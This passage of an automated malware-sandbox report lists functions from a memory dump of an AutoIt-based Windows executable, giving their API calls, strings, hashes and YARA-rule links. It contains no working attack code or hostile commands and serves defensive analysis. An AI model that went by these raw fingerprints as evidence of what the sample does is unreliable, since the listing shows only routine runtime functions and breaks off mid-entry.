API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 606fd2284bff72c8ecec232c3da34d1ca60591424ec0f9de7e380959025395d7
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: BD0140B244424ABBCF2A6F84CC41CED3F62BB18360F588415FE1858131D336D9B1BB81

Function 00F8B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00F8B2E4
ScreenToClient.USER32(?,?), ref: 00F8B2FC
ScreenToClient.USER32(?,?), ref: 00F8B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F8B33B

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 76c11ff3474f6a394f81fb204425d8fad2e9c89bc98f2c71f814915b52319106
Instruction ID: d49022fe7e42f7649aaf7128519f6b60ee3b7a1a3bb5a709362a1c0a819d60f7
Opcode Fuzzy Hash: 76c11ff3474f6a394f81fb204425d8fad2e9c89bc98f2c71f814915b52319106
Instruction Fuzzy Hash: 3D114675D0020DEFDB41DF99C8449EEBBB5FF18310F104166E914E3220D735AA559F50

Function 00F8B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F8B644
_memset.LIBCMT ref: 00F8B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FC6F20,00FC6F64), ref: 00F8B682
CloseHandle.KERNEL32 ref: 00F8B694

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 1b3e06bc7cd28e742ca8ef7aeceb3b05540ec3ae6e3a70f741d4b754656b1555
Instruction ID: cb5375967e41b86a8489c1210109cdb98f7f8fe49031863033fa3c4e9261d8a0
Opcode Fuzzy Hash: 1b3e06bc7cd28e742ca8ef7aeceb3b05540ec3ae6e3a70f741d4b754656b1555
Instruction Fuzzy Hash: 7FF082B25443187FE3102761BD07FBB3A9CEB08395F404028FA08E6192E7768C00E7A8

Function 00F66BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00F66BE6

Part of subcall function 00F676C4: _memset.LIBCMT ref: 00F676F9

_memmove.LIBCMT ref: 00F66C09
_memset.LIBCMT ref: 00F66C16
LeaveCriticalSection.KERNEL32(?), ref: 00F66C26

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: ac56b282f5af55e04e31d61cf78227966b3620b9a062e470d6126db4b6507339
Instruction ID: 8ae98093606bb05a94d991a167731f3b25ca8914ad13cc1a0af0c75006f5efd5
Opcode Fuzzy Hash: ac56b282f5af55e04e31d61cf78227966b3620b9a062e470d6126db4b6507339
Instruction Fuzzy Hash: 80F0543A100114BBCF016F55EC85A8ABF29EF45360F048065FE085E227D735E811EBB4

Function 00F02218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00F02231
SetTextColor.GDI32(?,000000FF), ref: 00F0223B
SetBkMode.GDI32(?,00000001), ref: 00F02250
GetStockObject.GDI32(00000005), ref: 00F02258
GetWindowDC.USER32(?,00000000), ref: 00F3BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00F3BE90
GetPixel.GDI32(00000000,?,00000000), ref: 00F3BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00F3BEC2
GetPixel.GDI32(00000000,?,?), ref: 00F3BEE2
ReleaseDC.USER32(?,00000000), ref: 00F3BEED

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 8dbec2321652028657c2f60a62fd9cfebe5a26c7b7f2cc15fcc2f7a2d9339f68
Instruction ID: 44f6693fee7d9b4b0d4901bd4a6bb7e7e98ef84673152ad07f15162af94d3864
Opcode Fuzzy Hash: 8dbec2321652028657c2f60a62fd9cfebe5a26c7b7f2cc15fcc2f7a2d9339f68
Instruction Fuzzy Hash: A6E03932904648EEEB215FA8EC4D7E83B10EB05332F148366FA69880E187714994EB22

Function 00F58712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00F5871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00F582E6), ref: 00F58722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F582E6), ref: 00F5872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00F582E6), ref: 00F58736

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: c3a8f457482d2641e59b10e53e866a07b7f29128025548ccee98039fe5a15ea4
Instruction ID: 2d9a53e5ec07a9f0cea701ae976f20fe255064545c87792ba70943f03c1604a3
Opcode Fuzzy Hash: c3a8f457482d2641e59b10e53e866a07b7f29128025548ccee98039fe5a15ea4
Instruction Fuzzy Hash: A2E08636A113159FD7205FB06D0CBE63BACEF547E2F244828B645DA050DA34844AE750

Function 00F5B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00F5B4BE

Strings

AutoIt3GUI, xrefs: 00F5B436
Container, xrefs: 00F5B43B

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: a3bef2de2b356640f75b40a926ed2117f253176dd0fed48f52372a92cf3328d8
Instruction ID: 02cbcc83ba8fb2b7de7be079ec7c34efec26b5c896ddcd6fabad4b3af1573a4b
Opcode Fuzzy Hash: a3bef2de2b356640f75b40a926ed2117f253176dd0fed48f52372a92cf3328d8
Instruction Fuzzy Hash: 61916A71600601AFDB24DF64C884B6ABBE5FF49711F24846DFE4ACB292EB70E845DB50

Function 00F6AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1FC86: _wcscpy.LIBCMT ref: 00F1FCA9

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

__wcsnicmp.LIBCMT ref: 00F6B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F6B0F6

Strings

LPT, xrefs: 00F6B027

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: eb806ec1986300a64e6d8ed8bac296ed1d7f0c767e42a67b740f288a877cce6d
Instruction ID: f9b4c3937ccda200249237cc525b979fe1fde9e62eac2a6163cf8218a640543c
Opcode Fuzzy Hash: eb806ec1986300a64e6d8ed8bac296ed1d7f0c767e42a67b740f288a877cce6d
Instruction Fuzzy Hash: 38618176E04215AFCB14DF94C891EAEB7B4EF09310F148069F916EB391E774AE84EB50

Function 00F12957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00F12968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00F12981

Strings

@, xrefs: 00F12975

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: f23aed8f2e45f022b35747d63aebb2a2198d54d34b4d173dbd2cde1dfd174039
Instruction ID: d14f045a97cfa4ef532243b2abf3779a4cc9a846c044c710d173db5f07ff5037
Opcode Fuzzy Hash: f23aed8f2e45f022b35747d63aebb2a2198d54d34b4d173dbd2cde1dfd174039
Instruction Fuzzy Hash: C3516B714087489BD320EF54DC85BAFB7E8FF85340F81885DF2D8411A1EBB49529EB56

Function 00F69734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00F04F0B: __fread_nolock.LIBCMT ref: 00F04F29

_wcscmp.LIBCMT ref: 00F69824
_wcscmp.LIBCMT ref: 00F69837

Strings

FILE, xrefs: 00F69770

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 5193acbe2b5d1b1f3dec2f8926180427c4d5aea570f0d3ac2e0178b5abcdc879
Instruction ID: 629226f69625ad56fa987d32964330b81f21a748c486b20deec66c0514f56f33
Opcode Fuzzy Hash: 5193acbe2b5d1b1f3dec2f8926180427c4d5aea570f0d3ac2e0178b5abcdc879
Instruction Fuzzy Hash: 6441B871A0421ABADF209AA5CC45FEFB7BDEF85710F000469FA04E7181DAB5A905AB61

Function 00F7258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F7259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F725D4

Strings

|, xrefs: 00F725A5

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: ccfb349ec716b9a58d45d1ee7cefdf192af0656af61ffe56a15eb23617194b94
Instruction ID: ee3006f74f016ca499cb99bad00261a3cd6ad8f15a6174fd8d03002c2b18d65c
Opcode Fuzzy Hash: ccfb349ec716b9a58d45d1ee7cefdf192af0656af61ffe56a15eb23617194b94
Instruction Fuzzy Hash: 50311771D00219ABCF51EFA1CC85EEEBFB8FF08350F10405AF918A6162EB355956EB60

Function 00F87A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00F87B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F87B76

Strings

', xrefs: 00F87ACA

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 14338e49bcf22a9baeb30cf0f6712e166e5b6c482d80cbf10e4af733e2385810
Instruction ID: 9bb05cd06ade4cc60dc83707bbf1ec6a9a22be6f9f664a48851105db55f13a0a
Opcode Fuzzy Hash: 14338e49bcf22a9baeb30cf0f6712e166e5b6c482d80cbf10e4af733e2385810
Instruction Fuzzy Hash: C5412875A0430A9FDB14EF64C981BEABBB5FF48300F20016AE904EB395D770A941EF90

Function 00F86A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00F86B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F86B53

Strings

static, xrefs: 00F86AB3

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 46470d81ce1ef125c8ee994f76e46b818ecb92d5c5905635ab62312ea2d59c38
Instruction ID: 55974f87372719a6f141367baac1760622d563bd6a14187ef24d82f603ca8a4c
Opcode Fuzzy Hash: 46470d81ce1ef125c8ee994f76e46b818ecb92d5c5905635ab62312ea2d59c38
Instruction Fuzzy Hash: F8318F71600608AEDB10AF64CC81FFB77A9FF88764F108619F9A5D7190DA35AC91E760

Function 00F628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F62911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F6294C

Strings

0, xrefs: 00F6290A

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: a4ba587e582f4fc32f378c338a9608b788a107152afe5124bc2fb142fb96309b
Instruction ID: 65125f74a84918ce7320abdfde7460827ae094d28c7743f8b9f57eed5b1ab596
Opcode Fuzzy Hash: a4ba587e582f4fc32f378c338a9608b788a107152afe5124bc2fb142fb96309b
Instruction Fuzzy Hash: E431F532E007059FEB64CF58CD45BAEBBB4EF85360F180029E881A61A1DB749940FB11

Function 00F739E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00F73A66

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Strings

AUTOITCALLVARIABLE%d, xrefs: 00F73A58
, $, xrefs: 00F73AA6

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 8dabf2b908a2b9c69041d3b8ee1ffcf79467032c209ca9352707954015aab44d
Instruction ID: 2b96e140fb74b0ac5bbf59b6400f2a6dbe7da304f20959c611b0b0e9c87c2e1b
Opcode Fuzzy Hash: 8dabf2b908a2b9c69041d3b8ee1ffcf79467032c209ca9352707954015aab44d
Instruction Fuzzy Hash: B8218175A00219BEDF10EF64CC82EAE77B9AF44740F404495E549A7182DB38EA46FB62

Function 00F866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F86761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F8676C

Strings

Combobox, xrefs: 00F8672E

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: eb950b7e4111baa9b45b7bd6cceedac72f96e8f81e41ddbcc6da37f013b38679
Instruction ID: 19b7374ff9bfa3647f5d275bf5f93e6698a72846a394c1c3aef45a2fb2fceb89
Opcode Fuzzy Hash: eb950b7e4111baa9b45b7bd6cceedac72f96e8f81e41ddbcc6da37f013b38679
Instruction Fuzzy Hash: 0E118275710208AFEF11AF54DC81EFF3B6AEB48368F104129F914DB290DA75DC51A7A0

Function 00F86C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00F01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F01D73
Part of subcall function 00F01D35: GetStockObject.GDI32(00000011), ref: 00F01D87
Part of subcall function 00F01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F01D91

GetWindowRect.USER32(00000000,?), ref: 00F86C71
GetSysColor.USER32(00000012), ref: 00F86C8B

Strings

static, xrefs: 00F86C4E

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 591247cc7a633e05d26ee1b61df50675664a458837419e86f026f1ebd96f2548
Instruction ID: 04fa7f6e79904c73475d7d02fee32304fde2e1acaedd260bf54a928fb7d81222
Opcode Fuzzy Hash: 591247cc7a633e05d26ee1b61df50675664a458837419e86f026f1ebd96f2548
Instruction Fuzzy Hash: F1212C72610209AFDF04DFA8DC45EFA7BA8FB09315F044629F955D3250D635E850EB60

Function 00F86920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00F869A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F869B1

Strings

edit, xrefs: 00F86986

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 70db0f24447c94cd9a091f2b1b151938a4456bd80933a9a51e62a70a2ee7a8a3
Instruction ID: 616a85aa93a99bc3ffdbcb32d4eeb3bc73513c6db5f2a8f0a4f440bffe58d5f0
Opcode Fuzzy Hash: 70db0f24447c94cd9a091f2b1b151938a4456bd80933a9a51e62a70a2ee7a8a3
Instruction Fuzzy Hash: 64116A71910208AFEB10AF649C45AEB37A9EB053B4F604724F9A5D71E0C635DC94B760

Function 00F629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F62A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F62A41

Strings

0, xrefs: 00F62A18

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: b26c0256bc388f6704f1c0c173301c959c42b8d0af987833de846fc609746c33
